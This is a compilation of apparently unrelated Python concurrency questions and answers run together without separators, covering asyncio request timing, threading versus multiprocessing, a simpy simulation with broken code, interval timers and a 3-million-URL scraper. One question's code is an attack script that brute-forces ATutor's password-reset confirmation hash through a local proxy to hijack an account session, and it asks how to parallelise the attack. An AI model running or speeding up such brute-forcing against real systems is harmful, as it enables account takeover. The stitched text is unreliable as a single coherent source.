I'm trying to run a list of HTTP GET requests against a URL, following a trace of interarrival times between the requests (occasionally with several requests fired at the same time).
I'm currently using asyncio and aiohttp, but the run takes much longer than the expected time (the one defined by the list of interarrival times) because the requests still seem to block execution.
My biggest issue is that I also have to record the response time of every request.
Here's the snippet of code:
import asyncio
import time

import aiohttp

async def main():
    iat = # list of interarrival times (in milliseconds)
    times = {}    # response times per arrival
    results = {}  # parsed responses per arrival
    start_time = time.time()
    url = 'http://10.250.0.12:31112/function/weather-station'
    async with aiohttp.ClientSession() as session:
        for i in range(len(iat)):  # iat == list of request interarrival times
            s = iat[i] / 1000
            n = countlist[i]  # countlist == how many requests to fire at this arrival
            await asyncio.sleep(s)
            j = 1
            t0 = time.time()
            results[i] = []
            times[i] = []
            while j <= n:  # n > 1 if there are multiple requests to be sent at the same time
                async with session.get(url) as response:
                    r = await response.json()
                    tr = time.time()
                    results[i].append(r['direction'])
                    times[i].append(tr - t0)
                j += 1
    end_time = time.time()
    print("exit, time:")
    print(end_time - start_time)

asyncio.run(main())
Is it possible to achieve this? Am I using the wrong methods?
I'm using Python 3.7 on top of Windows 10.
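One way to keep the schedule from stretching, sketched below: schedule each request as an independent task with asyncio.create_task so the loop only awaits the sleeps, then gather the responses and per-request latencies at the end. The url comes from the snippet above; the iat and countlist values here are made-up examples.

import asyncio
import time

import aiohttp

async def timed_get(session, url):
    # Fire one GET and return (parsed_json, elapsed_seconds).
    t0 = time.time()
    async with session.get(url) as response:
        data = await response.json()
    return data, time.time() - t0

async def main():
    iat = [100, 250, 50]    # interarrival times in ms (example values)
    countlist = [1, 2, 1]   # requests to fire at each arrival (example values)
    url = 'http://10.250.0.12:31112/function/weather-station'
    async with aiohttp.ClientSession() as session:
        tasks = []
        for s, n in zip(iat, countlist):
            await asyncio.sleep(s / 1000)
            # create_task schedules the request without waiting for its response,
            # so the next sleep starts right away
            tasks.extend(asyncio.create_task(timed_get(session, url)) for _ in range(n))
        results = await asyncio.gather(*tasks)
    for data, elapsed in results:
        print(elapsed, data.get('direction'))

asyncio.run(main())

Because the loop never awaits a response inline, the total wall-clock time tracks the sum of the interarrival delays rather than the sum of the response times.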
I have a method that iterates through a load of values and sends a requests call for each one. This works fine, however it takes a LONG time. I want to speed this up using multiprocessing in Python 3.
My question is: what is the correct way to implement this using multiprocessing so I can speed up these requests?
The existing method is as follows:
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
        # code = f'{word}{id}'
        h = hash_string(word)[0:10]
        url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
        print(f"Issuing reset request with: {h}")
        proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
        s = requests.Session()
        res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
        if res.status_code == 302:
            return True, s.cookies, count
        else:
            count += 1
    return False, None, count
I have tried to convert it based on the first example in the Python 3 docs here, however it just seems to hang when I start the script. No doubt I have implemented it wrong:
def send_request(word):
    # code = f'{word}{id}'
    h = hash_string(word)[0:10]
    url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
    print(f"Issuing reset request with: {h}")
    proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    s = requests.Session()
    res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
    if res.status_code == 302:
        return True, word
    else:
        return False
It is being called from a modified version of the original method, like so:
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
    with Pool(10) as pool:
        results, word = pool.map(send_request, words)
        if results:
            return True, word
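For reference, a hedged sketch of how the Pool version could be structured. pool.map returns a list of per-word results rather than a single tuple, so the results have to be iterated; imap_unordered yields them as workers finish, which lets the loop stop at the first success. The hash_string stand-in, the allow_redirects=False flag, and plain requests.get in place of a Session are assumptions added here, not part of the original code.

import hashlib
import itertools
import string
from multiprocessing import Pool

import requests

def hash_string(s):
    # stand-in for the question's hash_string helper (assumed SHA-1 hex here)
    return hashlib.sha1(s.encode()).hexdigest()

def send_request(word):
    h = hash_string(word)[0:10]
    url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
    proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # allow_redirects=False so a 302 comes back to us instead of being followed
    res = requests.get(url, proxies=proxies, headers={"Accept": "*/*"}, allow_redirects=False)
    # return the word alongside the outcome so the parent knows which prefix worked
    return res.status_code == 302, word

def change_password(id, prefix_length):
    words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
    with Pool(10) as pool:
        # imap_unordered yields results as they complete, so we can bail out early;
        # leaving the with-block terminates the remaining workers
        for ok, word in pool.imap_unordered(send_request, words):
            if ok:
                return True, word
    return False, None

On Windows the Pool should be created under an if __name__ == '__main__': guard so the worker processes can import the module cleanly.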
I'm trying to implement multithreading and multiprocessing on a sorting algorithm. The way I implemented it is:
Initialize a list of 10k items
Assign a random value between 0 and 100 to each element
arr = [1] * 10000
for x, i in enumerate(arr):
    arr[x] = random.randint(0, 100)
# Note: these are aliases of the same list, not independent copies
t_arr = arr
m_arr = arr
s_arr = arr
Create 2 sub-lists -- one for values lower than or equal to 50 and one for the rest
I then bubble-sorted both sub-lists in parallel, once using threads and once using processes.
Theoretically both should be faster than the serial version, but only multiprocessing is; multithreading gives the same timings as the serial run.
I have already tried different sorting algorithms; the problem persists.
# Threading Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in t_arr:
    if i <= 50:
        subarr1.append(i)
    else:
        subarr2.append(i)
# Sort first array
t1 = threading.Thread(target=bubbleSort, args=(subarr1,))
# Sort second array
t2 = threading.Thread(target=bubbleSort, args=(subarr2,))
t1.start()
t2.start()
t1.join()
t2.join()
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
# Serial Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in s_arr:
    if i <= 50:
        subarr1.append(i)
    else:
        subarr2.append(i)
# Sort first array
bubbleSort(subarr1)
# Sort second array
bubbleSort(subarr2)
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
# Multiprocessing Version
start_time = time.time()
subarr1 = []
subarr2 = []
# Split Array into 2
for i in m_arr:  # use the copy set aside for the multiprocessing run
    if i <= 50:
        subarr1.append(i)
    else:
        subarr2.append(i)
# Sort first array
p1 = multiprocessing.Process(target=bubbleSort, args=(subarr1,))
# Sort second array
p2 = multiprocessing.Process(target=bubbleSort, args=(subarr2,))
p1.start()
p2.start()
p1.join()
p2.join()
end_time = time.time() - start_time
print("--- %s seconds ---" % (end_time))
Multithreading: around 6 seconds
Serial: around 6 seconds (similar to Threading)
Multiprocessing: around 3 seconds
These results are consistent. Any advice?
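One likely explanation, with a sketch: CPython's global interpreter lock (GIL) lets only one thread execute Python bytecode at a time, so two CPU-bound bubble sorts in threads run essentially one after the other, while two processes can use two cores at once. The snippet below is illustrative (its own bubble_sort, made-up sizes), compares the two executors from concurrent.futures, and also brings the sorted halves back to the parent, which the Process version above does not do.

import random
import time
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor

def bubble_sort(data):
    # plain in-place bubble sort; returns the list so the executors can ship it back
    n = len(data)
    for i in range(n):
        for j in range(0, n - i - 1):
            if data[j] > data[j + 1]:
                data[j], data[j + 1] = data[j + 1], data[j]
    return data

def timed(executor_cls, halves):
    start = time.time()
    with executor_cls(max_workers=2) as ex:
        sorted_halves = list(ex.map(bubble_sort, halves))
    return time.time() - start, sorted_halves

if __name__ == '__main__':
    arr = [random.randint(0, 100) for _ in range(10000)]
    halves = [[x for x in arr if x <= 50], [x for x in arr if x > 50]]
    t_time, _ = timed(ThreadPoolExecutor, [h.copy() for h in halves])   # GIL: roughly serial speed
    p_time, _ = timed(ProcessPoolExecutor, [h.copy() for h in halves])  # true parallelism across cores
    print("threads: %.2fs  processes: %.2fs" % (t_time, p_time))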
I'm trying to simulate two machines working and failing at random times. When they fail, they call for assistance. These two machines are part of a bigger system of different machines, each of which needs to know when its neighbour has failed in order to do its job.
So far I have simulated the two machines, but I can't figure out how to send messages to their neighbours without each machine needing to know about the whole system.
This is what I have so far:
import simpy
import random
random_seed=42
MTTF = 3500
break_mean = 1 / MTTF
sim_time = 4 * 7*24*60 # 4 weeks 24/7
num_machines = 2
rep_time = 30
tpp = 20 #20 minutes to make each part
neighbour = 3 #How many should it send to?
# A broadcast-style messaging object: consumers attach to it via get_output_conn().
class messaging(object):
    # Initialize with the environment and a capacity, infinite by default via a simpy core constant.
    def __init__(self, env, capacity=simpy.core.Infinity):
        self.env = env
        self.capacity = capacity
        self.pipes = []
    # Broadcast a value to every connected pipe.
    def put(self, value):
        if not self.pipes:  # How to get this error?
            raise RuntimeError('There are no output pipes.')
        # Create the events that store the pipe values
        events = broken_machine()
        return self.env.all_of(events)
    def get_output_conn(self):
        # Create a store with this object's capacity for the new consumer.
        pipe = simpy.Store(self.env, capacity=self.capacity)
        # Register the pipe so broadcasts reach it.
        self.pipes.append(pipe)
        return pipe
def mesg_generator(number, env, out_pipe):
    msg = ('Failed')

def message_reciever(name, env, in_pipe):
    while True:
        msg = yield in_pipe.get()
        print("%s received message: %s" % (name, msg[1]))

def time_per_part():
    return tpp

def ttf():
    return random.expovariate(break_mean)
class Machine(object):
    def __init__(self, env, number, repair):
        # self.arg = arg
        self.env = env
        self.number = number
        self.parts_made = 0
        self.times_broken = 0
        self.broken = False
        self.process = env.process(self.working(repair))
        env.process(self.broken_machine())

    def working(self, repair):
        while True:
            work = time_per_part()
            while work:
                try:
                    begin = self.env.now
                    yield self.env.timeout(work)
                    work = 0
                except simpy.Interrupt:
                    self.broken = True
                    work -= self.env.now - begin
                    with repair.request(priority=1) as req:
                        yield req
                        yield self.env.timeout(rep_time)
                    self.times_broken += 1
                    yield message_reciever()
                    # print('Machine down')
                    self.broken = False  # Machine fixed again
            self.parts_made += 1

    def broken_machine(self):
        while True:
            yield self.env.timeout(ttf())
            if not self.broken:
                self.process.interrupt()
def other_jobs(env, repair):
    while True:
        work = tpp
        while work:
            with repair.request(priority=2) as req:
                yield req
                try:
                    begin = env.now
                    yield env.timeout(work)
                    work = 0
                except simpy.Interrupt:
                    work -= env.now - begin
print("This simulates machines 3 and 4 doing the same tasks.")
random.seed(random_seed)
env = simpy.Environment()
pipe = simpy.Store(env)
bc_pipe = messaging(env)
repair = simpy.PreemptiveResource(env, capacity = 1)
machines = [Machine(env, 'Machine %d' % i, repair)
            for i in range(num_machines)]
env.process(other_jobs(env, repair))
env.run(until=sim_time)
# Show how many times each machine failed:
for machine in machines:
    print("%s broke down %d times" % (machine.number, machine.times_broken))
I want to make my if statement run only if it has been more than x seconds since it last ran. I just can't find the way.
As you've provided no code, let's say this is your program:
while True:
    if doSomething:
        print("Did it!")
We can ensure that the if statement will only run if it has been x seconds since it last ran by doing the following:
from time import time

doSomething = 1
x = 1
timeLastDidSomething = time()
while True:
    if doSomething and time() - timeLastDidSomething > x:
        print("Did it!")
        timeLastDidSomething = time()
Hope this helps!
You'll want to use the time() function from the time module.
import time
...
old_time = time.time()
...
while (this is your game loop, presumably):
    ...
    now = time.time()
    if old_time + x <= now:
        old_time = now
        # only runs once every x seconds.
    ...
import time

# Time in seconds
time_since_last_if = 30
time_if_ended = None

# Your loop
while your_condition:
    # You haven't gone into the if yet, so we can only rely on the initial value of time_since_last_if
    if time_if_ended is not None:
        time_since_last_if = time.time() - time_if_ended
    if your_condition and time_since_last_if >= 30:
        do_something()
        # record when the if finished, to keep track of when it next becomes available
        time_if_ended = time.time()
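A small variation worth noting: for interval checks like these, time.monotonic() is not affected by system clock adjustments, so it is a safer timer than time.time(). A minimal sketch (x and the print are placeholders for your own threshold and work):

import time

x = 5  # minimum seconds between runs (placeholder value)
last_run = None

while True:
    now = time.monotonic()
    if last_run is None or now - last_run > x:
        print("Did it!")  # stand-in for the real work
        last_run = now
    time.sleep(0.1)  # avoid spinning the CPU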
I am trying to scrape a huge number of URLs (approximately 3 million) that contain JSON-formatted data, in the shortest time possible. To achieve this, I have a Python 3 script that uses Queue, multithreading and urllib3. Everything works fine during the first 3 minutes, then the code begins to slow down, and then it appears to be totally stuck. I have read everything I could find on this issue, but unfortunately the solution seems to require knowledge that lies far beyond me.
I tried to limit the number of threads: it did not fix anything. I also tried to limit the maxsize of my queue and to change the socket timeout, but it did not help either. The remote server is not blocking or blacklisting me, as I am able to re-launch my script whenever I want with good results at the beginning (the code starts to slow down at a fairly random time). Besides, sometimes my internet connection seems to drop, as I cannot browse any website, but this specific issue does not appear every time.
Here is my code (go easy on me please, I'm a beginner):
#!/usr/bin/env python
import urllib3,json,csv
from queue import Queue
from threading import Thread
csvFile = open("X.csv", 'wt',newline="")
writer = csv.writer(csvFile,delimiter=";")
writer.writerow(('A','B','C','D'))
def do_stuff(q):
    http = urllib3.connectionpool.connection_from_url('http://www.XXYX.com/', maxsize=30, timeout=20, block=True)
    while True:
        try:
            url = q.get()
            url1 = http.request('GET', url)
            doc = json.loads(url1.data.decode('utf8'))
            writer.writerow((doc['A'], doc['B'], doc['C'], doc['D']))
        except:
            print(url)
        finally:
            q.task_done()
q = Queue(maxsize=200)
num_threads = 15
for i in range(num_threads):
    worker = Thread(target=do_stuff, args=(q,))
    worker.setDaemon(True)
    worker.start()
for x in range(1,3000000):
    if x < 10:
        url = "http://www.XXYX.com/?i=" + str(x) + "&plot=short&r=json"
    elif x < 100:
        url = "http://www.XXYX.com/?i=tt00000" + str(x) + "&plot=short&r=json"
    elif x < 1000:
        url = "http://www.XXYX.com/?i=0" + str(x) + "&plot=short&r=json"
    elif x < 10000:
        url = "http://www.XXYX.com/?i=00" + str(x) + "&plot=short&r=json"
    elif x < 100000:
        url = "http://www.XXYX.com/?i=000" + str(x) + "&plot=short&r=json"
    elif x < 1000000:
        url = "http://www.XXYX.com/?i=0000" + str(x) + "&plot=short&r=json"
    else:
        url = "http://www.XXYX.com/?i=00000" + str(x) + "&plot=short&r=json"
    q.put(url)
q.join()
csvFile.close()
print("done")
As shazow said, it's not a matter of threads but of the pace at which each thread pulls data from the server. Try to include some delay in your code:
finally:
    sleep(50)  # requires: from time import sleep
    q.task_done()
It could also be improved with adaptive delays: for example, you could measure how much data you successfully got and, if that number drops, increase the sleep time, and vice versa.
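A minimal sketch of that adaptive idea, assuming the same do_stuff worker shape as in the question (the initial delay, step sizes and bounds are arbitrary): each worker tracks its recent outcomes and lengthens or shortens its own delay accordingly.

import time

def adaptive_delay(initial=0.5, step=0.25, minimum=0.05, maximum=10.0):
    # Returns (on_result, wait): report each success/failure, then wait the current delay.
    state = {'delay': initial}

    def on_result(success):
        # back off after a failure, speed up slowly after a success
        if success:
            state['delay'] = max(minimum, state['delay'] - step / 4)
        else:
            state['delay'] = min(maximum, state['delay'] + step)

    def wait():
        time.sleep(state['delay'])

    return on_result, wait

# Inside each worker thread (sketch):
# on_result, wait = adaptive_delay()
# while True:
#     url = q.get()
#     try:
#         ...fetch and write the row...
#         on_result(True)
#     except Exception:
#         on_result(False)
#     finally:
#         wait()
#         q.task_done()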